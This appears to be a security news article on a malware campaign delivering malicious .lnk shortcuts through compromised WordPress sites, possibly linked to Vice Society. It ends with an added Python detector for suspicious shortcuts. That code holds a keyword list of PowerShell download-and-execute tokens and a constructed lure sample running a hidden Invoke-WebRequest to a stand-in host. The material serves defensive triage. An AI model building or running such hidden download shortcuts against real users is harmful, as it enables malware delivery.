A malware campaign known for using “Lorem Ipsum” placeholder text lures has pivoted to ClickFix delivery through compromised WordPress websites, with security research published Tuesday suggesting the campaign may be linked to Vice Society, a ransom group previously known for large-scale data extortion campaigns.
The ClickFix variant uses compromised WordPress sites as hosting infrastructure, embedding malicious shortcut files (.lnk) in articles and download pages. When a victim double-clicks the file, Windows prompts for elevated execution under the guise of “enabling content,” and the victim unknowingly grants the malware system access through their own consent.
ClickFix Delivery: Bypassing User Security Habits Through Windows Prompts
The ClickFix delivery method exploits Windows shortcut files to trick users into running PowerShell commands that download and execute payloads silently. The technique works through Windows’ own user-interface prompts rather than by asking the victim to take action on a file that looks suspicious.
Users who have been trained to avoid suspicious email attachments do not perceive this variant as a dangerous file, because Windows itself appears to be “asking” them to approve the execution. The user reads the prompt as a legitimate system action rather than as a social engineering attempt.
Traditional multi-factor authentication does not mitigate ClickFix, because the execution appears to be authorized by the user’s own action: the authentication factor protects the initial access step, whereas ClickFix operates entirely through user-authorized execution.
Vice Society Connection and WordPress Hosting Infrastructure
Research published Tuesday suggested a possible link between the ClickFix campaign and Vice Society, a ransom group previously known for large-scale data extortion campaigns. If confirmed, the ClickFix pivot extends Vice Society’s operational arsenal beyond traditional phishing to social engineering with higher effectiveness rates.
The use of compromised WordPress websites as hosting infrastructure means the malicious content is embedded in legitimate-looking articles and download pages, making the delivery mechanism blend in with normal web browsing traffic. The combination of ClickFix delivery and WordPress hosting creates a pipeline that is difficult to detect without endpoint-level analysis of shortcut file execution.
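As an added example, not code from the article or the cited research, the following Python parses the Shell Link (.lnk) binary format (header, optional IDList/LinkInfo, and the StringData fields) to recover a shortcut's target path, arguments and ShowCommand, then flags the PowerShell download-and-execute pattern described above. The indicator list and the two constructed samples are assumptions for illustration, not indicators from the campaign.

```python
import struct

# Shell Link header start: HeaderSize 0x4C followed by the fixed LinkCLSID (MS-SHLLINK 2.1)
LNK_MAGIC = b"\x4c\x00\x00\x00" + bytes.fromhex("0114020000000000c000000000000046")
# LinkFlags bits (MS-SHLLINK 2.1.1) that decide which optional structures follow the header
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = [("name", 0x04), ("relative_path", 0x08), ("working_dir", 0x10),
                 ("arguments", 0x20), ("icon", 0x40)]
# Substrings an analyst would flag in a shortcut's target or arguments (assumed, not from the article)
SUSPICIOUS = ("powershell", "pwsh", "windowstyle hidden", "-w hidden", "-enc", "bypass",
              "invoke-webrequest", "iwr", "downloadstring", "invoke-expression", "iex", "http")

def parse_lnk(data):
    """Parse the header and StringData of a .lnk; returns ShowCommand plus the string fields."""
    if len(data) < 76 or data[:20] != LNK_MAGIC:
        raise ValueError("not a Shell Link (.lnk) file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    fields = {"show_command": struct.unpack_from("<I", data, 0x3C)[0]}
    pos = 76
    if flags & HAS_ID_LIST:      # skip LinkTargetIDList: 2-byte IDListSize then the items
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:    # skip LinkInfo: its 4-byte size field counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    for name, bit in STRING_FIELDS:   # StringData: CountCharacters, then chars, no terminator
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            width = 2 if flags & IS_UNICODE else 1
            raw = data[pos + 2:pos + 2 + count * width]
            fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", "replace")
            pos += 2 + count * width
    return fields

def lnk_indicators(fields):
    """Return the suspicious indicators found in a parsed shortcut (empty list = nothing flagged)."""
    blob = " ".join(fields.get(k, "") for k in ("relative_path", "arguments", "name")).lower()
    hits = [s for s in SUSPICIOUS if s in blob]
    if fields["show_command"] == 7:   # SW_SHOWMINNOACTIVE: console starts minimized, typical of lures
        hits.append("SW_SHOWMINNOACTIVE")
    return hits

def build_lnk(relative_path, arguments, show_command=1):
    """Build a minimal .lnk (header + RelativePath + Arguments) for constructed test samples."""
    flags = 0x08 | 0x20 | IS_UNICODE
    header = (LNK_MAGIC + struct.pack("<II", flags, 0) + bytes(24)      # LinkFlags, FileAttributes, 3 timestamps
              + struct.pack("<IIIHHII", 0, 0, show_command, 0, 0, 0, 0))  # FileSize .. Reserved3
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in (relative_path, arguments))
    return header + body

# Constructed samples: an ordinary Notepad shortcut and one shaped like the lure described above
BENIGN_LNK = build_lnk(r"..\..\Windows\notepad.exe", "notes.txt")
LURE_LNK = build_lnk(r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                     '-WindowStyle Hidden -Command "Invoke-WebRequest http://compromised-site.invalid/stage"', 7)
```

Run `lnk_indicators(parse_lnk(open(path, "rb").read()))` over shortcuts collected from endpoints or from download pages on the affected sites; a non-empty list is a triage signal, not a verdict.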
